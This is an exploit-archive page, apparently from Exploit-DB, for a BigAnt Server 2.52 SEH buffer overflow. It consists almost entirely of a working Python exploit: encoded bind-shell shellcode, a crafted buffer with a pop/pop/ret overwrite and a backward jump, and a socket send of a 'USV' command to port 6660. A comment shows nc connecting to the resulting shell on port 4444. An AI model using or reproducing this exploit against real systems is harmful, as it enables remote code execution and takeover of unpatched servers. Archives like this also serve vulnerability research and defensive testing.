# Title: BigAnt Server 2.52 SEH (0day) # EDB-ID: 10765 # CVE-ID: () # OSVDB-ID: () # Author: Lincoln # Published: 2009-12-29 # Verified: yes # Download Exploit Code # Download Vulnerable app view sourceprint? #!/usr/bin/python import socket, sys ######################### #BigAnt version 2.52 0day #Tested on XPSP2 & Win2k3 SP2 #Discovered by Lincoln #Thanks to muts & remote-exploit # #650 or so bytes available after seh, easier to jump back # #root@BT4VM:~# ./bigant.py 192.168.87.130 #Exploit sent! Connect to remote host on port 4444 # #root@BT4VM:~# nc -vn 192.168.87.130 4444 #(UNKNOWN) [192.168.87.130] 4444 (?) open #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # #C:\WINDOWS\system32> ######################### #[*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x46\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x43\x4b\x38\x4e\x37" "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x48" "\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x53\x4b\x38" "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c" "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x35\x46\x42\x4a\x42\x45\x37\x45\x4e\x4b\x58" "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x54" "\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x52\x4b\x38" "\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x38\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x48" "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x36" "\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x46\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x37\x43\x47" "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e" "\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30" "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45" "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x55\x43\x55\x43\x34" "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x41" "\x4e\x45\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x46\x46\x4a" "\x4c\x41\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41" "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" "\x42\x35\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56" "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x35" "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x36\x48\x36\x4a\x36\x43\x56" "\x4d\x56\x49\x58\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x52\x4e\x4c" "\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x32" "\x43\x49\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f" "\x48\x4d\x4b\x55\x47\x45\x44\x45\x41\x45\x41\x35\x41\x55\x4c\x36" "\x41\x30\x41\x45\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" "\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") host = sys.argv[1] # p/p/r from vbajet32.dll buffer = "\x90" * 218 + sc + "\x90" * 35 + "\xeb\x06\x90\x90" + "\x95\x32\x9a\x0f" buffer += "\x90" * 10 + "\xe9\x7c\xfc\xff\xff" + "\x90" * 650 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 6660)) #hardcoded default port s.send("USV " + buffer + "\r\n\r\n") print "Exploit sent! Connect to remote host on port 4444\n" s.close()